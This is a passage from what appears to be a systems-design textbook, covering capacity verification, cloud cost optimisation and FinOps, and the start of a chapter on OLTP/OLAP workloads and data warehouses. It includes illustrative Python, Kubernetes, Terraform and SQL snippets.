- Synthetic probes need isolated test accounts and sandbox credentials so they never pollute business data.
🧪 Practice
- Instrument a page with web-vitals and report LCP and INP with segmentation dimensions.
- Write a synthetic probe for a critical journey and define the alert threshold for it.
- Interview: Synthetic checks are green but users report slowness. What is going on? (Hint: think about where probes run, what devices they use, and which flows nobody scripted.)
Capacity Verification
Capacity planning produces a claim: "we can handle Black Friday". Capacity verification is the act of proving it, ideally before Black Friday. The difference matters because untested capacity plans are wrong in one direction almost every time — the bottleneck is never the resource the spreadsheet was about.
A defensible capacity statement has four parts: the load level, the workload shape, the SLOs that held, and the date it was verified. "We sustained 12 000 rps of production-shaped traffic for 30 minutes with p99 under 400 ms and errors under 0.05%, on 2026-08-14" is a capacity statement. "We can do about 12k" is a rumour.
THE VERIFICATION LOOP
forecast demand ---> compute required capacity ---> TEST IT
^ |
| v
update model <--- compare predicted vs measured <--- record the
first bottleneck
from dataclasses import dataclass
@dataclass
class CapacityModel:
peak_rps: float
rps_per_instance: float # from a measured single-instance test
target_utilisation: float = 0.70 # queueing headroom (13.1)
failure_domains: int = 3 # e.g. availability zones
def instances_needed(self) -> int:
import math
base = self.peak_rps / (self.rps_per_instance * self.target_utilisation)
# N+1 within the largest failure domain: survive losing one whole zone
# while still meeting SLOs, not merely staying up.
per_domain = math.ceil(base / (self.failure_domains - 1))
return per_domain * self.failure_domains
model = CapacityModel(peak_rps=12_000, rps_per_instance=250)
print(model.instances_needed()) # 69 instances, zone-failure tolerant
# Verification: does reality match the model? Anything beyond ~15% error means
# the model is missing a bottleneck (a shared dependency, a lock, a quota).
def verify(predicted: int, measured_max_rps: float, model: CapacityModel) -> None:
predicted_rps = predicted * model.rps_per_instance * model.target_utilisation
error = (measured_max_rps - predicted_rps) / predicted_rps
print(f"predicted {predicted_rps:,.0f} rps, measured {measured_max_rps:,.0f} rps "
f"({error:+.1%}) -> {'model holds' if abs(error) < 0.15 else 'INVESTIGATE'}")
verify(69, measured_max_rps=9_800, model=model) # -19%: something else binds first
Verification only counts if the whole path is exercised. Scaling the application tier to 69 instances proves nothing if the database connection limit, a third-party API quota, a NAT gateway's port range, or a load balancer's pre-warming limit binds first — and one of those usually does. Testing the full path at target load is what turns a plan into a fact.
Two production-grade practices extend this. A game day (9.4) runs the load test while deliberately failing a component — kill a zone at peak and confirm the remaining capacity holds. Load testing in production, done carefully with a small percentage of synthetic traffic tagged so it can be excluded from business metrics, is the only way to test the exact configuration users hit; it requires a kill switch and close monitoring, and it is how large systems verify capacity they cannot afford to replicate in staging.
Re-verify on a schedule and after any significant change. Capacity decays silently: a new feature adds a query per request, a dependency slows down, data volume grows past an index's efficiency. A capacity number older than a quarter is a historical fact, not a current one.
Key Takeaways
- A capacity statement needs a load level, a workload shape, the SLOs that held, and a verification date.
- Size for target utilisation around 70% and for surviving the loss of a whole failure domain.
- Compare predicted against measured capacity; a large gap means the model is missing a bottleneck.
- Test the entire path — quotas, connection limits, and gateways bind before the app tier does.
- Capacity decays; re-verify on a schedule and after major changes.
🧪 Practice
- Build a capacity model for a service and compute the instance count needed to survive losing one of three zones at peak.
- Run a test at the modelled peak and record which component saturates first.
- Interview: How would you verify capacity for an event ten times your normal peak? (Hint: think about what you cannot replicate in staging, what quotas live outside your account, and how you would test the real path safely.)
<a id="134-cost-optimization"></a>
13.4 Cost Optimization
Cost is a non-functional requirement like latency or availability, and it is the one that most often goes unowned until a bill forces the conversation. This subchapter covers how to attribute cost to individual requests and features, the pricing models that make compute cheap or expensive, why storage bills are usually about access rather than capacity, how to size resources against real usage, how to reason about the three-way trade between cost, latency, and reliability, and the organisational practices that keep the whole thing under control.
Cost Modeling per Request
An infrastructure bill arrives as one large number, which is exactly the wrong unit for making decisions. The useful unit is cost per request, per user, or per business transaction, because that is what tells you whether a feature is worth running, which endpoint deserves optimisation, and whether growth improves or destroys your margins.
The mental model: divide total spend by the meaningful denominator, and then attribute it — cost per checkout matters more than cost per HTTP request, since one is tied to revenue and the other is not.
COST OF ONE "SEARCH" REQUEST
+-------------------------+-----------+--------------------------------------+
| Component | Cost (uc) | Basis |
+-------------------------+-----------+--------------------------------------+
| Compute (app tier) | 12.0 | 40 ms CPU on a $0.04/vCPU-hr instance |
| Search cluster | 31.0 | Dominant: memory-resident index |
| Cache (Redis) | 2.0 | Amortised cluster cost / requests |
| Database reads | 4.0 | 3 reads at metered read units |
| Inter-AZ network | 3.0 | 60 KB crossing a zone boundary |
| Egress to internet | 18.0 | 200 KB at $0.09/GB |
| Logging + tracing | 7.0 | 4 KB of logs, 10% trace sampling |
+-------------------------+-----------+--------------------------------------+
| TOTAL | 77.0 | = $0.00077 per search |
+-------------------------+-----------+--------------------------------------+
uc = microcents. At 50M searches/day: $385/day, ~$11.5k/month.
Note where the money is: the search cluster and EGRESS. Optimising the app
tier's 12 uc caps out at 15% of the bill; halving payload size saves more.
from dataclasses import dataclass
@dataclass
class RequestCost:
cpu_ms: float
memory_gb_s: float
db_reads: int
db_writes: int
egress_kb: float
log_kb: float
# Illustrative unit prices; substitute your provider's actual rates.
CPU_PER_MS = 0.04 / 3_600_000 # $/vCPU-hour -> $/vCPU-ms
MEM_PER_GB_S = 0.004 / 3600
DB_READ = 0.00000025 # $ per read unit
DB_WRITE = 0.00000125 # writes cost ~5x reads
EGRESS_PER_KB = 0.09 / 1_048_576 # $0.09/GB
LOG_PER_KB = 0.50 / 1_048_576 # ingest-priced logging is expensive
def total(self) -> float:
return (self.cpu_ms * self.CPU_PER_MS
+ self.memory_gb_s * self.MEM_PER_GB_S
+ self.db_reads * self.DB_READ
+ self.db_writes * self.DB_WRITE
+ self.egress_kb * self.EGRESS_PER_KB
+ self.log_kb * self.LOG_PER_KB)
def breakdown(self) -> dict[str, float]:
t = self.total()
return {
"compute": (self.cpu_ms * self.CPU_PER_MS) / t,
"database": (self.db_reads * self.DB_READ + self.db_writes * self.DB_WRITE) / t,
"egress": (self.egress_kb * self.EGRESS_PER_KB) / t,
"logging": (self.log_kb * self.LOG_PER_KB) / t,
}
search = RequestCost(cpu_ms=40, memory_gb_s=0.02, db_reads=3, db_writes=0,
egress_kb=200, log_kb=4)
print(f"${search.total():.8f} per search")
for k, share in sorted(search.breakdown().items(), key=lambda kv: -kv[1]):
print(f" {k:<9} {share:5.1%}") # optimise the top line, not the fun one
# Unit economics: the number that decides whether growth is good news.
REVENUE_PER_SEARCH = 0.0021 # ad revenue per search
margin = (REVENUE_PER_SEARCH - search.total()) / REVENUE_PER_SEARCH
print(f"gross margin per search: {margin:.1%}")
Building the model requires attribution, which in practice means tagging every resource with a service, team, and environment, and enabling per-request telemetry for the metered components. Anything untagged lands in a "shared" bucket that grows until nobody can explain it; a good target is over 95% of spend attributable.
Two effects surprise people the first time they build this model. Observability often costs more than compute for chatty services — ingest-priced logs at scale are brutal, which is why sampling (12.1) is a cost decision as much as a signal-quality one. And egress frequently exceeds everything else for media-heavy or API-heavy products, which makes payload size and CDN offload the highest-leverage optimisations available.
Key Takeaways
- Model cost per request, per user, and per business transaction — the total bill is not an actionable unit.
- Include compute, memory, storage I/O, network egress, and observability; the last two are routinely the largest.
- Tag everything so spend is attributable; aim for 95%+ attribution.
- Compare unit cost against unit revenue to know whether growth helps margins.
- Optimise the largest line item, not the most interesting one.
🧪 Practice
- Build a per-request cost model for one endpoint, including logging and egress, and rank the components.
- Compute the monthly cost of a feature at current traffic and at 10x.
- Interview: Your bill grew 40% while traffic grew 10%. Where do you look? (Hint: think about which costs scale with something other than request count — retained data, log volume, cross-zone chatter, idle reserved capacity.)
Compute Pricing Models
Cloud compute is sold several ways, and the same workload can differ in price by 5x depending on which model it uses. The choice is driven by one question: how predictable and how interruptible is this workload?
| Model | Discount vs on-demand | Commitment | Interruptible | Fits |
|---|---|---|---|---|
| On-demand | Baseline | None | No | Spiky, unpredictable, short-lived |
| Reserved / savings plan | 30-60% | 1 or 3 years | No | Steady baseline capacity |
| Spot / preemptible | 60-90% | None | Yes, minutes' notice | Batch, CI, stateless workers |
| Serverless (per-invocation) | Varies | None | No | Bursty, low-duty-cycle, event-driven |
The standard architecture is layered: cover the steady baseline with commitments, handle predictable daily variation with on-demand autoscaling, and run everything interruption-tolerant on spot.
CAPACITY LAYERS OVER A DAY
instances
120 | .-''-. <- on-demand: the predictable daytime peak
| .-' '-.
80 | .-' '-.
+---------------------------------- <- reserved / savings plan: 24x7 baseline
40 |=================================
|######### spot: batch + async workers, shifted to off-peak ########
0 +---------------------------------------------------------------> time
00:00 09:00 18:00 24:00
Commit to the flat part only. Committing to peak means paying for peak at 03:00.
def annual_cost(hourly_on_demand: float, instances: int, hours: int = 8760) -> float:
return hourly_on_demand * instances * hours
def layered_plan(baseline: int, peak: int, batch: int,
hourly: float, peak_hours_per_day: int = 9) -> dict:
reserved = annual_cost(hourly * 0.60, baseline) # ~40% off
on_demand = annual_cost(hourly, peak - baseline, peak_hours_per_day * 365)
spot = annual_cost(hourly * 0.25, batch) # ~75% off
naive_peak = annual_cost(hourly, peak + batch) # everything on-demand at peak
total = reserved + on_demand + spot
return {"reserved": reserved, "on_demand": on_demand, "spot": spot,
"total": total, "naive": naive_peak, "saving": 1 - total / naive_peak}
plan = layered_plan(baseline=40, peak=120, batch=30, hourly=0.20)
for k, v in plan.items():
print(f"{k:<10} {v:,.0f}" if k != "saving" else f"{k:<10} {v:.1%}")
# Commit only to what you are confident you will still be running. An unused
# 3-year reservation is worse than on-demand: you pay for capacity twice.
def safe_commitment(hourly_usage: list[int], confidence_percentile: int = 10) -> int:
"""Commit near the LOW percentile of observed usage, not the average."""
s = sorted(hourly_usage)
return s[int(len(s) * confidence_percentile / 100)]
Spot instances deserve a design note: they are reclaimed with roughly two minutes' warning, so using them safely means handling the interruption signal (drain, checkpoint, requeue), diversifying across instance types and zones so one capacity shortage does not take every worker, and keeping stateful or latency-critical components off them. With those in place, spot is the single largest cost lever in most architectures.
Serverless inverts the calculation: you pay per invocation and per GB-second with no idle cost, which is dramatically cheaper for spiky, low-duty-cycle workloads and dramatically more expensive for steady high-throughput ones. There is a crossover point — compute it rather than arguing about it (10.4).
Key Takeaways
- Layer pricing models: commitments for the 24x7 baseline, on-demand for the predictable peak, spot for interruptible work.
- Commit to a low percentile of observed usage, never to peak or even average.
- Spot saves 60-90% but requires interruption handling and instance-type diversification.
- Serverless wins on bursty low-duty-cycle workloads and loses on steady high-throughput ones; find the crossover.
- Graviton-class or newer instance families often beat the current generation on price-performance for the same money.
🧪 Practice
- Take a service's hourly instance count for a month and compute the safe commitment level at the 10th percentile.
- Estimate the annual saving from moving a batch pipeline to spot, including the cost of restarted work.
- Interview: When is serverless more expensive than a reserved instance? (Hint: think about duty cycle — what fraction of the hour the code is actually executing — and where the crossover lies.)
Storage and Egress Costs
Storage bills confuse people because the headline price per gigabyte is almost never the whole cost. The real bill has four components: capacity, requests, retrieval, and transfer out. For a hot workload on a cheap archival tier, requests and retrieval can dwarf capacity by an order of magnitude.
| Tier | Capacity $/GB-mo | Request cost | Retrieval | Min duration | Fits |
|---|---|---|---|---|---|
| Hot object store | ~0.023 | Low | None | None | Active data |
| Infrequent access | ~0.0125 | Higher | Per GB | 30 days | Monthly-access data |
| Archive | ~0.004 | High | Per GB + hours to restore | 90 days | Compliance retention |
| Block (SSD) | ~0.08-0.125 | IOPS-priced | None | None | Databases, low latency |
The classic mistake is a lifecycle policy that moves objects to archive after 30 days when they are still read weekly. Capacity drops 80% and the bill goes up, because every read now pays retrieval plus per-request fees, and objects deleted before the minimum duration are billed for it anyway.
def monthly_storage_cost(gb: float, reads_per_month: int, tier: str) -> float:
tiers = {
# (capacity $/GB-mo, per-1000-GET, retrieval $/GB, min days)
"standard": (0.023, 0.0004, 0.000, 0),
"infrequent": (0.0125, 0.0010, 0.010, 30),
"archive": (0.004, 0.0025, 0.020, 90),
}
cap, per_1k_get, retrieval, _ = tiers[tier]
avg_object_gb = 0.002 # 2 MB objects
return (gb * cap
+ reads_per_month / 1000 * per_1k_get
+ reads_per_month * avg_object_gb * retrieval) # the line people forget
for tier in ("standard", "infrequent", "archive"):
cold = monthly_storage_cost(10_000, reads_per_month=1_000, tier=tier)
warm = monthly_storage_cost(10_000, reads_per_month=5_000_000, tier=tier)
print(f"{tier:<11} rarely-read=${cold:9,.2f} frequently-read=${warm:12,.2f}")
# archive wins by ~5x when data is cold and loses by ~100x when it is not.
Egress — data leaving the cloud to the internet — is priced far above ingress, which is usually free, and it is the line item that most often surprises a growing product. Worse, internal transfer is metered too: cross-availability- zone traffic is billed in both directions, so a chatty microservice mesh spread across zones pays a permanent tax on every hop.
NETWORK PRICING SHAPE (typical order of magnitude)
ingress from internet ............ free
same-AZ, private IPs ............. free
cross-AZ (each direction) ........ ~$0.01/GB <- the silent microservice tax
cross-region .................... ~$0.02/GB
internet egress ................. ~$0.09/GB <- 9x cross-AZ, and it compounds
via CDN egress .................. ~$0.02-0.085/GB, and CACHE HITS never touch
your origin at all
The highest-leverage egress reductions, in order: serve static and cacheable content from a CDN so origin egress collapses to cache misses (5.4); shrink payloads (compression, a compact format, field filtering so clients fetch only what they render); keep chatty service-to-service traffic zone-local by preferring same-zone routing; and avoid cross-region replication of data nobody reads in the other region.
For storage capacity itself the levers are unglamorous and effective: lifecycle policies matched to actual access patterns rather than guesses, deduplication, compression at rest, deleting orphaned snapshots and unattached volumes (which quietly accumulate forever), and setting retention on logs and backups instead of keeping everything indefinitely (4.6).
Key Takeaways
- Storage cost is capacity plus requests plus retrieval plus transfer; capacity is often the smallest part.
- Match lifecycle tiers to real access patterns — archiving warm data increases the bill and adds minimum-duration charges.
- Internet egress is the expensive direction; ingress is typically free.
- Cross-AZ traffic is billed both ways and is a permanent tax on chatty cross-zone services.
- CDN offload plus smaller payloads is usually the biggest single egress win.
🧪 Practice
- Compute the monthly cost of 5 TB read 100 000 times per month in each storage tier and identify the crossover point.
- Estimate the cross-AZ transfer cost of a service that makes 10 downstream calls per request at 20 KB each, with a third of calls crossing a zone.
- Interview: Your egress bill doubled but user count did not change. What would you investigate? (Hint: think about payload size, cache hit ratio, and whether something started bypassing the CDN.)
Right-Sizing Resources
Most cloud waste is not exotic; it is instances provisioned for a peak that never comes, sized by whoever created them from a number that felt safe. Right-sizing is the continuous practice of matching provisioned resources to observed usage plus a deliberate margin.
The reason it needs to be continuous is that the fit decays: traffic patterns change, code gets more efficient or less, and the instance families available get cheaper. A size that was correct a year ago is a guess today.
THE WASTE PATTERN
vCPU
16 |=================================== provisioned (paid for, 24x7)
|
| ,--.
4 | ,-''-. ,-' '-. actual peak usage
| _.-' '' '-._
1 |__.-' '--.
+----------------------------------------------> time
waste = 12 vCPU * 24h * 365d = 75% of the bill for nothing
Right-sized: 4 vCPU + autoscaling, or 6 vCPU for burst headroom.
def right_size(observed_p95: float, observed_max: float, provisioned: float,
headroom: float = 1.30) -> dict:
"""Size against p95 with headroom, then sanity-check against the observed max.
Sizing on the mean causes throttling; sizing on the max buys the worst
minute of the year forever. p95 plus headroom is the usual compromise.
"""
recommended = max(observed_p95 * headroom, observed_max * 1.05)
return {
"provisioned": provisioned,
"recommended": round(recommended, 1),
"waste_pct": round((1 - recommended / provisioned) * 100, 1),
}
print(right_size(observed_p95=3.1, observed_max=4.4, provisioned=16))
# {'provisioned': 16, 'recommended': 4.6, 'waste_pct': 71.2}
# Memory needs a different rule: exceeding it kills the process, while exceeding
# CPU merely slows it. Use the observed maximum, never p95, and add more margin.
def right_size_memory(observed_max_gb: float, headroom: float = 1.5) -> float:
return observed_max_gb * headroom
# Kubernetes: requests drive scheduling and cost; limits cap the blast radius.
resources:
requests:
cpu: "250m" # what the scheduler reserves -> what you effectively pay
memory: "512Mi" # set from OBSERVED usage, not from a round number
limits:
cpu: "1000m" # burst headroom; CPU over the limit is throttled
memory: "768Mi" # memory over the limit is an OOM kill, so keep this
# close to requests and generous versus real usage
# Requests far above real usage waste whole nodes: the scheduler reserves
# capacity nobody uses, and you pay for nodes running at 20% utilisation.
Beyond instance size, the recurring sources of waste are worth an explicit sweep: idle non-production environments running nights and weekends (schedule them off — an easy 60-70% saving on those accounts), unattached storage volumes and orphaned snapshots, load balancers and NAT gateways left behind by deleted stacks, over-provisioned database instances sized for a migration that finished, forgotten dev clusters, and log retention nobody ever shortened.
Right-sizing is safest when paired with autoscaling: the smaller instance is less frightening if the system adds instances under load. Sizing down without autoscaling converts a cost problem into an availability problem, which is a bad trade.
Key Takeaways
- Size CPU against p95 usage plus 20-30% headroom; size memory against the observed maximum, since exceeding it kills the process.
- Right-sizing decays — revisit it quarterly and after major changes.
- In Kubernetes, requests drive both scheduling and effective cost; inflated requests waste whole nodes.
- Sweep for idle non-production environments, orphaned volumes, snapshots, and forgotten load balancers.
- Pair downsizing with autoscaling so a cost win does not become an availability risk.
🧪 Practice
- Pull two weeks of CPU and memory for a service and compute a right-sized recommendation for each.
- Write a schedule that stops non-production environments outside working hours and estimate the annual saving.
- Interview: Why is sizing memory with the same rule as CPU dangerous? (Hint: think about what happens when each resource is exceeded — one degrades, the other terminates.)
Cost vs. Latency vs. Reliability Trade-offs
Cost, latency, and reliability form a triangle in which improving one usually costs one or both of the others. Engineering maturity is not making the triangle disappear; it is making the trade explicit, quantified, and owned by someone with the authority to choose.
LATENCY
/\
/ \ caching, replicas, bigger instances,
/ \ edge presence -> faster, MORE expensive
/ \
/ \
/__________\
COST RELIABILITY
multi-region, N+2 redundancy, backups, hot standby
-> more reliable, MORE expensive
Pick a point deliberately. Every architecture is already a point on this
triangle, chosen by accident if not on purpose.
Concrete examples of the same decision at different points:
| Decision | Cheap option | Expensive option | What you buy |
|---|---|---|---|
| Availability target | 99.9% (single region) | 99.99% (multi-region active) | ~43 min/month less downtime, ~2-3x cost |
| Read scaling | Cache with 5 min TTL | Read replicas, no staleness | Freshness, at replica cost |
| Backups | Nightly snapshot, RPO 24h | Continuous PITR, RPO 5 min | Data loss window |
| Deployment | Rolling, brief mixed state | Blue-green, instant rollback | Rollback speed, double capacity |
| Static content | Served from origin | Global CDN | Latency worldwide, offload egress |
def availability_decision(annual_revenue: float, current_nines: float,
target_nines: float, extra_annual_cost: float) -> None:
"""Does buying more availability pay for itself in avoided lost revenue?"""
hours = 8760
downtime_now = hours * (1 - current_nines)
downtime_target = hours * (1 - target_nines)
revenue_per_hour = annual_revenue / hours
avoided = (downtime_now - downtime_target) * revenue_per_hour
print(f"downtime {downtime_now:.1f}h -> {downtime_target:.1f}h per year")
print(f"avoided loss ${avoided:,.0f} vs added cost ${extra_annual_cost:,.0f} "
f"-> {'WORTH IT' if avoided > extra_annual_cost else 'NOT WORTH IT'}")
# Caveats the arithmetic cannot capture: reputational damage, contractual
# SLA penalties, and the fact that added complexity introduces its OWN
# failure modes — a multi-region system can be less reliable in practice
# than a well-run single-region one.
availability_decision(annual_revenue=40_000_000, current_nines=0.999,
target_nines=0.9999, extra_annual_cost=900_000)
Two heuristics make these decisions faster. First, not all traffic deserves the same treatment: the checkout path may justify multi-region redundancy while the recommendations service is allowed to be best-effort, and tiering by criticality avoids paying premium prices for everything. Second, degrade rather than fail: serving stale cached data, disabling personalisation, or falling back to a simpler ranking model keeps the product usable at a fraction of the cost of full redundancy — and it is often what users would choose if asked.
Finally, note the cases where the triangle collapses and one change helps everything at once. Caching reduces latency and cost and load on a fragile dependency. Smaller payloads help latency, egress cost, and mobile reliability together. Fixing an N+1 query improves all three. Look for those before trading anything away.
Key Takeaways
- Cost, latency, and reliability trade against each other; make the choice explicit rather than accidental.
- Quantify availability decisions against revenue at risk, while acknowledging what the arithmetic omits.
- Tier by criticality — premium reliability for revenue paths, best-effort for the rest.
- Graceful degradation buys most of the user-visible benefit of redundancy for a fraction of the price.
- Some changes — caching, smaller payloads, removing N+1 queries — improve all three at once; find those first.
🧪 Practice
- Compute the annual revenue at risk for 99.9% versus 99.99% availability for a business you know, and decide whether the upgrade pays.
- Classify a system's endpoints into criticality tiers and assign a different reliability target and budget to each.
- Interview: How would you cut infrastructure cost by 30% without hurting user experience? (Hint: think about what is provisioned but idle, what is retained but unread, and which traffic never needed premium treatment.)
FinOps Practices
FinOps is the operational discipline that keeps cost decisions in the hands of the engineers who cause them. Its premise is simple: in the cloud, engineers make purchasing decisions every time they write a Terraform file, so cost has to be a visible engineering signal rather than a monthly surprise delivered to finance.
The practice runs as a loop, mirroring the observability loop of chapter 12.
INFORM ---------------> OPTIMIZE ---------------> OPERATE ---------+
visibility, tagging, right-sizing, commitments, budgets, alerts,|
allocation, unit cost architecture changes policy, review |
^ |
+-----------------------------------------------------------------+
each cycle updates the model and the forecast
Inform is the prerequisite for everything else: tag resources by service, team, and environment; allocate shared costs on a documented basis; publish per- team dashboards; and track unit cost (cost per request, per user, per order) rather than only total spend. Unit cost is the metric that distinguishes healthy growth from a leak — a total bill rising with traffic is fine, unit cost rising is not.
# Anomaly detection on daily spend: catch runaway cost within a day, not in the
# monthly invoice. The forgotten GPU cluster is a rite of passage.
import statistics
def cost_anomaly(daily: list[float], sigma: float = 3.0) -> None:
baseline, today = daily[:-1], daily[-1]
mean, sd = statistics.mean(baseline), statistics.pstdev(baseline)
z = (today - mean) / sd if sd else 0.0
if z > sigma:
# Page a human only for genuine anomalies; monthly-close noise is not one.
print(f"ALERT ${today:,.0f} vs baseline ${mean:,.0f} (z={z:.1f}), "
f"annualised impact ${(today - mean) * 365:,.0f}")
cost_anomaly([4100, 4250, 4180, 4090, 4220, 4160, 9800])
# Policy as code: prevent waste at provisioning time instead of finding it later.
# Untagged resources cannot be attributed, and unattributable cost is
# unmanageable cost.
resource "aws_instance" "worker" {
instance_type = var.instance_type
tags = {
Service = var.service # required by policy
Team = var.team # required by policy
Environment = var.environment # required by policy
CostCenter = var.cost_center # required by policy
ExpiresAt = var.expires_at # non-prod: reaped automatically after this
}
lifecycle {
precondition {
condition = var.environment == "prod" || var.expires_at != ""
error_message = "Non-production resources must set an expiry date."
}
}
}
The practices that hold up over time: showback or chargeback so each team sees its own spend, budgets with alerts at 50/80/100% of forecast, cost as a line item in design reviews for anything material, an owner for the cloud bill who is an engineer rather than only an accountant, and automated reaping of untagged or expired non-production resources. Forecasting closes the loop, and it should be driven by unit cost and projected demand rather than by extrapolating last month's total.
Two anti-patterns are worth naming. Cost-cutting sprints that fix everything once and then let it decay are far less effective than continuous small adjustments. And optimising engineering time away to save infrastructure money is usually a loss: an engineer-week costs more than most of the savings people spend an engineer-week chasing — measure both sides before starting.
Key Takeaways
- FinOps runs a loop: inform (visibility), optimise (act), operate (govern).
- Tagging and allocation come first; unattributable cost cannot be managed.
- Track unit cost, not just total spend — rising unit cost is the real warning.
- Alert on daily anomalies rather than discovering them in the monthly invoice.
- Enforce tagging and expiry as policy at provisioning time, and prefer continuous small optimisation to periodic cost-cutting sprints.
🧪 Practice
- Define a tagging standard for a system and identify which existing resources would fail it.
- Build a daily cost anomaly check with a threshold and a defined owner for the alert.
- Interview: How would you make engineers care about cloud cost without slowing them down? (Hint: think about which signals engineers already act on daily, and how cost could become one of them rather than a quarterly review.)
<a id="14-large-scale-data-and-intelligent-systems"></a>
14. Large-Scale Data and Intelligent Systems
Every system that survives long enough accumulates two things it was not originally designed for: an enormous amount of historical data, and a demand to make decisions from it. This chapter covers the platforms that store analytical data, the batch and streaming engines that process it, the search and recommendation systems that turn it into ranked results, and the ML serving infrastructure that puts models on the request path. The emphasis throughout is on the systems around the data and the models — pipelines, freshness, correctness, and rollout — rather than on the statistics inside them.
<a id="141-data-platform-architecture"></a>
14.1 Data Platform Architecture
Analytical systems fail differently from transactional ones: not with a dropped write, but with a number that is quietly wrong, or a query that costs $400. This subchapter covers why analytical workloads need their own storage architecture, the warehouse and lakehouse designs that serve them, how transformation pipelines are ordered, how analytical schemas are modelled, and the quality and lineage controls that make the output trustworthy.
OLTP vs. OLAP Workloads
A single database engine cannot be excellent at both of the jobs a company needs from its data. The first job is running the product: "insert this order", "fetch user 42's cart", "decrement this inventory count". These are OLTP (online transaction processing) workloads — enormous numbers of tiny operations, each touching a handful of rows, each needing to be correct and fast right now. The second job is understanding the product: "what was revenue by country by week for the last two years, split by acquisition channel?" That is OLAP (online analytical processing) — a small number of enormous queries, each touching billions of rows but only a few columns.
The reason these need different systems is physical, not political. Storage reads
in blocks. A row-oriented store keeps all of a row's columns adjacent, so
fetching one whole order costs one block read — perfect for OLTP, terrible for
scanning one column across a billion rows, because every block you read is mostly
columns you did not want. A column-oriented store keeps each column
contiguous, so scanning revenue reads only revenue blocks. It also compresses
far better, because a column holds values of one type with heavy repetition: a
country column across a billion rows might hold 200 distinct values, which
dictionary encoding turns into roughly one byte each.
ROW STORE (OLTP) COLUMN STORE (OLAP)
block 1: [id|user|country|cents] block 1: [id, id, id, id, ...]
block 2: [id|user|country|cents] block 2: [user, user, user, ...]
block 3: [id|user|country|cents] block 3: [country, country, ...] <-- only
block 4: [id|user|country|cents] block 4: [cents, cents, cents, ...] <-- these
"get order 903" -> 1 block "get order 903" -> 4 scattered reads
"SUM(cents) by -> reads ALL "SUM(cents) by -> reads 2 of 4
country" 4 blocks country" column files
The architectural consequence is that you do not point dashboards at the production database. Analytical queries scan enough data to evict the OLTP working set from cache, and hold snapshots long enough to bloat the write path — a report can take down checkout. Analytical data is instead replicated into a separate system tuned for scans, with a deliberate freshness lag.
| Dimension | OLTP | OLAP |
|---|---|---|
| Unit of work | One row / small transaction | Billions of rows, few columns |
| Query rate | Thousands per second | Thousands per day |
| Latency target | Single-digit ms | Seconds to minutes |
| Storage layout | Row-oriented, B-tree indexes | Columnar, sorted, compressed |
| Concurrency | Very high, short-lived | Low, long-lived |
| Schema | Normalized (3NF) | Denormalized (star schema) |
| Correctness need | ACID per transaction | Consistent snapshot per query |
| Typical systems | PostgreSQL, MySQL, DynamoDB | BigQuery, Snowflake, ClickHouse |
# Why columnar wins: a rough cost model for one analytical query.
ROWS = 2_000_000_000
BYTES_PER_ROW = 400 # full row width across ~30 columns
QUERY_COLS = 3 # the query references only 3 of them
COL_BYTES = 12 # combined width of those 3 columns, uncompressed
COMPRESSION = 6 # typical columnar ratio on low-cardinality data
SCAN_GBPS = 2.0 # effective scan throughput of the engine
row_bytes = ROWS * BYTES_PER_ROW # must read every column
col_bytes = ROWS * COL_BYTES / COMPRESSION # only referenced columns
for label, b in (("row store", row_bytes), ("column store", col_bytes)):
gb = b / 1e9
print(f"{label:<13} scans {gb:8.1f} GB -> {gb / SCAN_GBPS:6.1f} s")
# row store scans 800.0 GB -> 400.0 s
# column store scans 4.0 GB -> 2.0 s
# A 200x gap that indexing on the row store cannot recover, because the query
# touches most rows — an index improves selectivity, not scan volume.
Modern engines blur the line. HTAP systems (TiDB, SingleStore) and in-database column stores (MySQL HeatWave, columnar extensions for PostgreSQL) maintain both layouts over one dataset. They are a genuine option at moderate scale and remove a pipeline, but they give up the independent scaling and cost profile of a dedicated analytical system, so the split remains the default once analytical volume grows.
Key Takeaways
- OLTP is many tiny row-level operations; OLAP is few huge column-level scans.
- Row stores read whole rows cheaply; column stores read few columns cheaply and compress far better because a column is homogeneous.
- Never run analytics on the production OLTP database: scans evict its cache and long snapshots hurt the write path.
- The separation costs freshness — analytical data is deliberately behind.
- HTAP engines merge both layouts and are viable at moderate scale, but give up independent scaling of the two workloads.
🧪 Practice
- Take three queries from a product you know and classify each as OLTP or OLAP using rows touched and columns referenced.
- Estimate bytes scanned for one analytical query under row and columnar layouts, using the cost model above with your own table widths.
- Interview: A product manager wants a live dashboard reading from the production database. What do you propose instead? (Hint: think about what a full scan does to the OLTP buffer cache, and how stale the dashboard is actually allowed to be.)
Data Warehouses
A data warehouse is the system of record for analysis: one place where data from every source — the product database, payment processors, the CRM, ad platforms, event streams — is cleaned, conformed to shared definitions, and queried with SQL. Its real product is less storage than agreement. When finance, marketing, and engineering each compute "active users" from their own extract, they arrive with three numbers and spend the meeting arguing. A warehouse exists so "active user" is defined once, in one table, that everyone reads.
The defining architectural move of the modern warehouse is the separation of storage and compute. Older MPP appliances bound them together: to store more you bought more machines, and those machines idled between queries. Cloud warehouses keep data in object storage and start compute clusters against it on demand, which changes three things — storage becomes cheap and effectively unbounded, concurrent workloads get isolated clusters over the same data instead of fighting for one, and idle cost approaches zero.
CLOUD WAREHOUSE: SEPARATED STORAGE AND COMPUTE
BI tool data science scheduled ELT
| | |
+-----v-----+ +-----v-----+ +-----v-----+
| compute | | compute | | compute | <- sized and billed
| cluster A | | cluster B | | cluster C | independently;
| (small) | | (large) | | (medium) | autosuspend when idle
+-----+-----+ +-----+-----+ +-----+-----+
| | |
+-------+-------+--------+--------+
| |
+------v-------------------------v------+
| metadata / catalog (files, stats, | <- the "brain": which
| partitions, snapshots, permissions) | files make a table
+------+---------------------------------+
|
+------v---------------------------------+
| object storage: immutable columnar | <- one copy of the data
| files (Parquet/ORC), partitioned |
+----------------------------------------+
Query performance inside a warehouse comes mostly from not reading data.
Three mechanisms do that work: partition pruning (skip whole directories whose
partition key falls outside the WHERE clause), file and block skipping (each
file carries per-column min/max statistics, so a file whose range cannot match is
never opened), and clustering or sort keys (physically ordering rows so those
min/max ranges stay tight instead of overlapping).
-- The highest-leverage habit in warehouse SQL: filter the partition column
-- explicitly, and select only the columns you need.
-- BAD: no partition filter, SELECT * -> full-table scan, every column read.
SELECT * FROM events WHERE user_id = 42;
-- GOOD: partition pruning limits files opened; projection limits bytes read.
SELECT event_type, occurred_at -- 2 columns, not 30
FROM events
WHERE event_date BETWEEN '2026-08-01' AND '2026-08-31' -- prunes partitions
AND user_id = 42; -- min/max skipping
-- Clustering makes the second predicate cheap by keeping user_id ranges tight
-- within each file, so most files are skipped on their statistics alone.
ALTER TABLE events CLUSTER BY (user_id);
Warehouses are usually organized in layers so raw fidelity and business meaning
